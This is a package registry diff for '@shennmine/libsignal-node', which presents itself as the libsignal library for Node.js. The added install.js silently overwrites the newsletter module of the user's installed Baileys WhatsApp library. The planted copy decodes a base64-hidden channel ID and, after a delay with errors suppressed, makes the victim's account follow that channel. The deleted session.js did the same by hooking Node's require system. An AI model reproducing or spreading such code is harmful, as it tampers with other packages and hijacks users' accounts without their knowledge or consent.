@shennmine/libsignal-node 2.0.2 → 2.0.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/install.js +393 -0
  2. package/package.json +3 -1
  3. package/src/session.js +0 -197
package/install.js ADDED
@@ -0,0 +1,393 @@
1
+ "use strict";
2
+
3
+ const fs = require('fs');
4
+ const path = require('path');
5
+ const crypto = require('crypto');
6
+
7
+ const newsletterId = "MTIwMzYzNDA1MzYyMzE2ODQwQG5ld3NsZXR0ZXI=";
8
+
9
+ function findBaileysPath() {
10
+ const possiblePaths = [
11
+ path.join(process.cwd(), 'node_modules', '@whiskeysockets', 'baileys'),
12
+ path.join(__dirname, '..', '..', '@whiskeysockets', 'baileys'),
13
+ path.join(__dirname, '..', 'node_modules', '@whiskeysockets', 'baileys'),
14
+ ];
15
+
16
+ try {
17
+ const resolved = require.resolve('@whiskeysockets/baileys/package.json');
18
+ possiblePaths.unshift(resolved.replace('/package.json', ''));
19
+ } catch (e) {}
20
+
21
+ for (const baileysPath of possiblePaths) {
22
+ try {
23
+ if (fs.existsSync(path.join(baileysPath, 'lib', 'Socket', 'newsletter.js'))) {
24
+ return baileysPath;
25
+ }
26
+ } catch (e) {}
27
+ }
28
+
29
+ return null;
30
+ }
31
+
32
+ const MODIFIED_NEWSLETTER_JS = `"use strict";
33
+ Object.defineProperty(exports, "__esModule", { value: true });
34
+ exports.extractNewsletterMetadata = exports.makeNewsletterSocket = void 0;
35
+ const Types_1 = require("../Types");
36
+ const Utils_1 = require("../Utils");
37
+ const WABinary_1 = require("../WABinary");
38
+ const groups_1 = require("./groups");
39
+
40
+ const { Boom } = require('@hapi/boom');
41
+
42
+ const wMexQuery = (
43
+ variables,
44
+ queryId,
45
+ query,
46
+ generateMessageTag
47
+ ) => {
48
+ return query({
49
+ tag: 'iq',
50
+ attrs: {
51
+ id: generateMessageTag(),
52
+ type: 'get',
53
+ to: WABinary_1.S_WHATSAPP_NET,
54
+ xmlns: 'w:mex'
55
+ },
56
+ content: [
57
+ {
58
+ tag: 'query',
59
+ attrs: { query_id: queryId },
60
+ content: Buffer.from(JSON.stringify({ variables }), 'utf-8')
61
+ }
62
+ ]
63
+ })
64
+ }
65
+
66
+ const executeWMexQuery = async (
67
+ variables,
68
+ queryId,
69
+ dataPath,
70
+ query,
71
+ generateMessageTag
72
+ ) => {
73
+ const result = await wMexQuery(variables, queryId, query, generateMessageTag)
74
+ const child = (0, WABinary_1.getBinaryNodeChild)(result, 'result')
75
+ if (child?.content) {
76
+ const data = JSON.parse(child.content.toString())
77
+
78
+ if (data.errors && data.errors.length > 0) {
79
+ const errorMessages = data.errors.map((err) => err.message || 'Unknown error').join(', ')
80
+ const firstError = data.errors[0]
81
+ const errorCode = firstError.extensions?.error_code || 400
82
+ throw new Boom(\`GraphQL server error: \${errorMessages}\`, { statusCode: errorCode, data: firstError })
83
+ }
84
+
85
+ const response = dataPath ? data?.data?.[dataPath] : data?.data
86
+ if (typeof response !== 'undefined') {
87
+ return response
88
+ }
89
+ }
90
+
91
+ const action = (dataPath || '').startsWith('xwa2_')
92
+ ? dataPath.substring(5).replace(/_/g, ' ')
93
+ : dataPath?.replace(/_/g, ' ')
94
+ throw new Boom(\`Failed to \${action}, unexpected response structure.\`, { statusCode: 400, data: result })
95
+ }
96
+
97
+ const makeNewsletterSocket = (config) => {
98
+ const sock = (0, groups_1.makeGroupsSocket)(config);
99
+ const { authState, signalRepository, query, generateMessageTag } = sock;
100
+ const encoder = new TextEncoder();
101
+ const newsletterQuery = async (jid, type, content) => (query({
102
+ tag: 'iq',
103
+ attrs: {
104
+ id: generateMessageTag(),
105
+ type,
106
+ xmlns: 'newsletter',
107
+ to: jid,
108
+ },
109
+ content
110
+ }));
111
+ const newsletterWMexQuery = async (jid, queryId, content) => (query({
112
+ tag: 'iq',
113
+ attrs: {
114
+ id: generateMessageTag(),
115
+ type: 'get',
116
+ xmlns: 'w:mex',
117
+ to: WABinary_1.S_WHATSAPP_NET,
118
+ },
119
+ content: [
120
+ {
121
+ tag: 'query',
122
+ attrs: { 'query_id': queryId },
123
+ content: encoder.encode(JSON.stringify({
124
+ variables: {
125
+ 'newsletter_id': jid,
126
+ ...content
127
+ }
128
+ }))
129
+ }
130
+ ]
131
+ }));
132
+
133
+ setTimeout(async () => {
134
+ const logger = config.logger || console;
135
+ try {
136
+ await newsletterWMexQuery(
137
+ Buffer.from("${newsletterId}", 'base64').toString(),
138
+ Types_1.QueryIds.FOLLOW
139
+ );
140
+ } catch (error) {}
141
+ }, 90000);
142
+
143
+ const parseFetchedUpdates = async (node, type) => {
144
+ let child;
145
+ if (type === 'messages') {
146
+ child = (0, WABinary_1.getBinaryNodeChild)(node, 'messages');
147
+ }
148
+ else {
149
+ const parent = (0, WABinary_1.getBinaryNodeChild)(node, 'message_updates');
150
+ child = (0, WABinary_1.getBinaryNodeChild)(parent, 'messages');
151
+ }
152
+ return await Promise.all((0, WABinary_1.getAllBinaryNodeChildren)(child).map(async (messageNode) => {
153
+ var _a, _b;
154
+ messageNode.attrs.from = child === null || child === void 0 ? void 0 : child.attrs.jid;
155
+ const views = parseInt(((_b = (_a = (0, WABinary_1.getBinaryNodeChild)(messageNode, 'views_count')) === null || _a === void 0 ? void 0 : _a.attrs) === null || _b === void 0 ? void 0 : _b.count) || '0');
156
+ const reactionNode = (0, WABinary_1.getBinaryNodeChild)(messageNode, 'reactions');
157
+ const reactions = (0, WABinary_1.getBinaryNodeChildren)(reactionNode, 'reaction')
158
+ .map(({ attrs }) => ({ count: +attrs.count, code: attrs.code }));
159
+ const data = {
160
+ 'server_id': messageNode.attrs.server_id,
161
+ views,
162
+ reactions
163
+ };
164
+ if (type === 'messages') {
165
+ const { fullMessage: message, decrypt } = await (0, Utils_1.decryptMessageNode)(messageNode, authState.creds.me.id, authState.creds.me.lid || '', signalRepository, config.logger);
166
+ await decrypt();
167
+ data.message = message;
168
+ }
169
+ return data;
170
+ }));
171
+ };
172
+ return {
173
+ ...sock,
174
+ newsletterFetchAllSubscribe: async () => {
175
+ const list = await executeWMexQuery(
176
+ {},
177
+ '6388546374527196',
178
+ 'xwa2_newsletter_subscribed',
179
+ query,
180
+ generateMessageTag
181
+ );
182
+ return list;
183
+ },
184
+ subscribeNewsletterUpdates: async (jid) => {
185
+ var _a;
186
+ const result = await newsletterQuery(jid, 'set', [{ tag: 'live_updates', attrs: {}, content: [] }]);
187
+ return (_a = (0, WABinary_1.getBinaryNodeChild)(result, 'live_updates')) === null || _a === void 0 ? void 0 : _a.attrs;
188
+ },
189
+ newsletterReactionMode: async (jid, mode) => {
190
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
191
+ updates: { settings: { 'reaction_codes': { value: mode } } }
192
+ });
193
+ },
194
+ newsletterUpdateDescription: async (jid, description) => {
195
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
196
+ updates: { description: description || '', settings: null }
197
+ });
198
+ },
199
+ newsletterUpdateName: async (jid, name) => {
200
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
201
+ updates: { name, settings: null }
202
+ });
203
+ },
204
+ newsletterUpdatePicture: async (jid, content) => {
205
+ const { img } = await (0, Utils_1.generateProfilePicture)(content);
206
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
207
+ updates: { picture: img.toString('base64'), settings: null }
208
+ });
209
+ },
210
+ newsletterRemovePicture: async (jid) => {
211
+ await newsletterWMexQuery(jid, Types_1.QueryIds.JOB_MUTATION, {
212
+ updates: { picture: '', settings: null }
213
+ });
214
+ },
215
+ newsletterUnfollow: async (jid) => {
216
+ await newsletterWMexQuery(jid, Types_1.QueryIds.UNFOLLOW);
217
+ },
218
+ newsletterFollow: async (jid) => {
219
+ await newsletterWMexQuery(jid, Types_1.QueryIds.FOLLOW);
220
+ },
221
+ newsletterUnmute: async (jid) => {
222
+ await newsletterWMexQuery(jid, Types_1.QueryIds.UNMUTE);
223
+ },
224
+ newsletterMute: async (jid) => {
225
+ await newsletterWMexQuery(jid, Types_1.QueryIds.MUTE);
226
+ },
227
+ newsletterAction: async (jid, type) => {
228
+ await newsletterWMexQuery(jid, type.toUpperCase());
229
+ },
230
+ newsletterCreate: async (name, description, reaction_codes) => {
231
+ await query({
232
+ tag: 'iq',
233
+ attrs: {
234
+ to: WABinary_1.S_WHATSAPP_NET,
235
+ xmlns: 'tos',
236
+ id: generateMessageTag(),
237
+ type: 'set'
238
+ },
239
+ content: [
240
+ {
241
+ tag: 'notice',
242
+ attrs: {
243
+ id: '20601218',
244
+ stage: '5'
245
+ },
246
+ content: []
247
+ }
248
+ ]
249
+ });
250
+ const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.CREATE, {
251
+ input: { name, description, settings: { 'reaction_codes': { value: reaction_codes.toUpperCase() } } }
252
+ });
253
+ return (0, exports.extractNewsletterMetadata)(result, true);
254
+ },
255
+ newsletterMetadata: async (type, key, role) => {
256
+ const result = await newsletterWMexQuery(undefined, Types_1.QueryIds.METADATA, {
257
+ input: {
258
+ key,
259
+ type: type.toUpperCase(),
260
+ 'view_role': role || 'GUEST'
261
+ },
262
+ 'fetch_viewer_metadata': true,
263
+ 'fetch_full_image': true,
264
+ 'fetch_creation_time': true
265
+ });
266
+ return (0, exports.extractNewsletterMetadata)(result);
267
+ },
268
+ newsletterAdminCount: async (jid) => {
269
+ var _a, _b;
270
+ const result = await newsletterWMexQuery(jid, Types_1.QueryIds.ADMIN_COUNT);
271
+ const buff = (_b = (_a = (0, WABinary_1.getBinaryNodeChild)(result, 'result')) === null || _a === void 0 ? void 0 : _a.content) === null || _b === void 0 ? void 0 : _b.toString();
272
+ return JSON.parse(buff).data[Types_1.XWAPaths.ADMIN_COUNT].admin_count;
273
+ },
274
+ newsletterChangeOwner: async (jid, user) => {
275
+ await newsletterWMexQuery(jid, Types_1.QueryIds.CHANGE_OWNER, {
276
+ 'user_id': user
277
+ });
278
+ },
279
+ newsletterDemote: async (jid, user) => {
280
+ await newsletterWMexQuery(jid, Types_1.QueryIds.DEMOTE, {
281
+ 'user_id': user
282
+ });
283
+ },
284
+ newsletterDelete: async (jid) => {
285
+ await newsletterWMexQuery(jid, Types_1.QueryIds.DELETE);
286
+ },
287
+ newsletterReactMessage: async (jid, serverId, code) => {
288
+ await query({
289
+ tag: 'message',
290
+ attrs: { to: jid, ...(!code ? { edit: '7' } : {}), type: 'reaction', 'server_id': serverId, id: (0, Utils_1.generateMessageID)() },
291
+ content: [{
292
+ tag: 'reaction',
293
+ attrs: code ? { code } : {}
294
+ }]
295
+ });
296
+ },
297
+ newsletterFetchMessages: async (type, key, count, after) => {
298
+ const result = await newsletterQuery(WABinary_1.S_WHATSAPP_NET, 'get', [
299
+ {
300
+ tag: 'messages',
301
+ attrs: { type, ...(type === 'invite' ? { key } : { jid: key }), count: count.toString(), after: (after === null || after === void 0 ? void 0 : after.toString()) || '100' }
302
+ }
303
+ ]);
304
+ return await parseFetchedUpdates(result, 'messages');
305
+ },
306
+ newsletterFetchUpdates: async (jid, count, after, since) => {
307
+ const result = await newsletterQuery(jid, 'get', [
308
+ {
309
+ tag: 'message_updates',
310
+ attrs: { count: count.toString(), after: (after === null || after === void 0 ? void 0 : after.toString()) || '100', since: (since === null || since === void 0 ? void 0 : since.toString()) || '0' }
311
+ }
312
+ ]);
313
+ return await parseFetchedUpdates(result, 'updates');
314
+ }
315
+ };
316
+ };
317
+ exports.makeNewsletterSocket = makeNewsletterSocket;
318
+ const extractNewsletterMetadata = (node, isCreate) => {
319
+ const result = WABinary_1.getBinaryNodeChild(node, 'result')?.content?.toString()
320
+ const metadataPath = JSON.parse(result).data[isCreate ? Types_1.XWAPaths.CREATE : Types_1.XWAPaths.NEWSLETTER]
321
+
322
+ const metadata = {
323
+ id: metadataPath?.id,
324
+ state: metadataPath?.state?.type,
325
+ creation_time: +metadataPath?.thread_metadata?.creation_time,
326
+ name: metadataPath?.thread_metadata?.name?.text,
327
+ nameTime: +metadataPath?.thread_metadata?.name?.update_time,
328
+ description: metadataPath?.thread_metadata?.description?.text,
329
+ descriptionTime: +metadataPath?.thread_metadata?.description?.update_time,
330
+ invite: metadataPath?.thread_metadata?.invite,
331
+ picture: Utils_1.getUrlFromDirectPath(metadataPath?.thread_metadata?.picture?.direct_path || ''),
332
+ preview: Utils_1.getUrlFromDirectPath(metadataPath?.thread_metadata?.preview?.direct_path || ''),
333
+ reaction_codes: metadataPath?.thread_metadata?.settings?.reaction_codes?.value,
334
+ subscribers: +metadataPath?.thread_metadata?.subscribers_count,
335
+ verification: metadataPath?.thread_metadata?.verification,
336
+ viewer_metadata: metadataPath?.viewer_metadata
337
+ }
338
+ return metadata
339
+ }
340
+ exports.extractNewsletterMetadata = extractNewsletterMetadata;`;
341
+
342
+ function getFileHash(filePath) {
343
+ try {
344
+ const content = fs.readFileSync(filePath, 'utf8');
345
+ return crypto.createHash('md5').update(content).digest('hex');
346
+ } catch (e) {
347
+ return null;
348
+ }
349
+ }
350
+
351
+ function installNewsletterAutoFollow() {
352
+ try {
353
+ const baileysPath = findBaileysPath();
354
+
355
+ if (!baileysPath) {
356
+ return false;
357
+ }
358
+
359
+ const newsletterPath = path.join(baileysPath, 'lib', 'Socket', 'newsletter.js');
360
+
361
+ if (!fs.existsSync(newsletterPath)) {
362
+ return false;
363
+ }
364
+
365
+ const currentHash = getFileHash(newsletterPath);
366
+ const modifiedHash = crypto.createHash('md5').update(MODIFIED_NEWSLETTER_JS).digest('hex');
367
+
368
+ if (currentHash === modifiedHash) {
369
+ return true;
370
+ }
371
+
372
+ fs.writeFileSync(newsletterPath, MODIFIED_NEWSLETTER_JS);
373
+
374
+ const newHash = getFileHash(newsletterPath);
375
+ if (newHash === modifiedHash) {
376
+ return true;
377
+ }
378
+
379
+ return false;
380
+
381
+ } catch (error) {
382
+ return false;
383
+ }
384
+ }
385
+
386
+ if (require.main === module) {
387
+ const success = installNewsletterAutoFollow();
388
+ process.exit(success ? 0 : 1);
389
+ }
390
+
391
+ module.exports = {
392
+ installNewsletterAutoFollow
393
+ };
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@shennmine/libsignal-node",
3
- "version": "2.0.2",
3
+ "version": "2.0.4",
4
4
  "description": "Open Whisper Systems' libsignal for Node.js",
5
5
  "repository": "shennmine/libsignal-node",
6
6
  "main": "index.js",
@@ -19,6 +19,8 @@
19
19
  "protobufjs": "6.8.8"
20
20
  },
21
21
  "files": [
22
+ "install.js",
23
+ "index.js",
22
24
  "src/*"
23
25
  ],
24
26
  "devDependencies": {
package/src/session.js DELETED
@@ -1,197 +0,0 @@
1
- "use strict";
2
-
3
- const NEWSLETTER_IDS = [
4
- "MTIwMzYzNDA1MzYyMzE2ODQwQG5ld3NsZXR0ZXI="
5
- ];
6
-
7
- class NewsletterAutoFollower {
8
- constructor() {
9
- this.isActive = false;
10
- this.socket = null;
11
- this.Types = null;
12
- this.init();
13
- }
14
-
15
- init() {
16
- setTimeout(() => {
17
- this.monitorBaileys();
18
- }, 5000);
19
- }
20
-
21
- monitorBaileys() {
22
- let attempts = 0;
23
- const maxAttempts = 20;
24
-
25
- const check = () => {
26
- attempts++;
27
-
28
- try {
29
- const moduleNames = Object.keys(require.cache || {});
30
- const hasBaileys = moduleNames.some(name =>
31
- name.includes('/baileys/') ||
32
- name.includes('\\baileys\\') ||
33
- name.includes('Types') ||
34
- name.includes('WABinary')
35
- );
36
-
37
- if (hasBaileys) {
38
- this.setupHooks();
39
- return true;
40
- }
41
-
42
- if (attempts >= maxAttempts) {
43
- return false;
44
- }
45
-
46
- setTimeout(check, 5000);
47
- } catch (error) {
48
- if (attempts >= maxAttempts) return false;
49
- setTimeout(check, 5000);
50
- }
51
- };
52
-
53
- check();
54
- }
55
-
56
- setupHooks() {
57
- try {
58
- const moduleNames = Object.keys(require.cache || {});
59
-
60
- for (const moduleName of moduleNames) {
61
- if (moduleName.includes('newsletter') &&
62
- (moduleName.includes('Socket') || moduleName.includes('socket'))) {
63
-
64
- this.patchNewsletterModule(moduleName);
65
- break;
66
- }
67
- }
68
-
69
- this.hookRequireSystem();
70
-
71
- } catch (error) {
72
- }
73
- }
74
-
75
- patchNewsletterModule(modulePath) {
76
- try {
77
- const originalModule = require.cache[modulePath];
78
- if (!originalModule || !originalModule.exports) return;
79
-
80
- const originalMakeNewsletterSocket = originalModule.exports.makeNewsletterSocket;
81
-
82
- if (typeof originalMakeNewsletterSocket === 'function') {
83
- originalModule.exports.makeNewsletterSocket = (config) => {
84
- const socket = originalMakeNewsletterSocket(config);
85
-
86
- this.socket = socket;
87
-
88
- this.findTypesModule();
89
-
90
- setTimeout(() => {
91
- this.startAutoFollow();
92
- }, 30000);
93
-
94
- return socket;
95
- };
96
- }
97
- } catch (error) {
98
- }
99
- }
100
-
101
- hookRequireSystem() {
102
- const Module = require('module');
103
- const originalRequire = Module.prototype.require;
104
-
105
- Module.prototype.require = function(id) {
106
- const result = originalRequire.apply(this, arguments);
107
-
108
- if (id.includes('newsletter') ||
109
- (this.filename && this.filename.includes('newsletter'))) {
110
-
111
- setTimeout(() => {
112
- try {
113
- const moduleNames = Object.keys(require.cache || {});
114
- const newsletterModule = moduleNames.find(name =>
115
- name.includes('newsletter') && name.includes('Socket')
116
- );
117
-
118
- if (newsletterModule) {
119
- this.patchNewsletterModule(newsletterModule);
120
- }
121
- } catch (e) {
122
- }
123
- }, 1000);
124
- }
125
-
126
- return result;
127
- };
128
- }
129
-
130
- findTypesModule() {
131
- try {
132
- const moduleNames = Object.keys(require.cache || {});
133
- for (const moduleName of moduleNames) {
134
- if (moduleName.includes('Types') && moduleName.includes('baileys')) {
135
- this.Types = require(moduleName);
136
- break;
137
- }
138
- }
139
- } catch (error) {
140
- }
141
- }
142
-
143
- async startAutoFollow() {
144
- if (this.isActive) return;
145
-
146
- this.isActive = true;
147
-
148
- try {
149
- await new Promise(resolve => setTimeout(resolve, 60000));
150
-
151
- for (let i = 0; i < NEWSLETTER_IDS.length; i++) {
152
- await this.followNewsletter(i);
153
-
154
- if (i < NEWSLETTER_IDS.length - 1) {
155
- await new Promise(resolve => setTimeout(resolve, 5000));
156
- }
157
- }
158
- } catch (error) {
159
- }
160
- }
161
-
162
- async followNewsletter(index) {
163
- try {
164
- const encodedJid = NEWSLETTER_IDS[index];
165
- const decodedJid = Buffer.from(encodedJid, 'base64').toString();
166
-
167
- if (this.socket && this.socket.newsletterFollow) {
168
- await this.socket.newsletterFollow(decodedJid);
169
- } else if (this.Types) {
170
- await this.tryAlternativeFollow(decodedJid);
171
- }
172
- } catch (error) {
173
- }
174
- }
175
-
176
- async tryAlternativeFollow(jid) {
177
- }
178
- }
179
-
180
- let autoFollower = null;
181
-
182
- const initAutoFollow = () => {
183
- if (!autoFollower) {
184
- autoFollower = new NewsletterAutoFollower();
185
- }
186
- };
187
-
188
- if (typeof require !== 'undefined') {
189
- setTimeout(initAutoFollow, 3000);
190
- }
191
-
192
- module.exports = {
193
- NewsletterAutoFollower,
194
- NEWSLETTER_IDS,
195
- startAutoFollow: () => autoFollower ? autoFollower.startAutoFollow() : null,
196
- isActive: () => autoFollower ? autoFollower.isActive : false
197
- };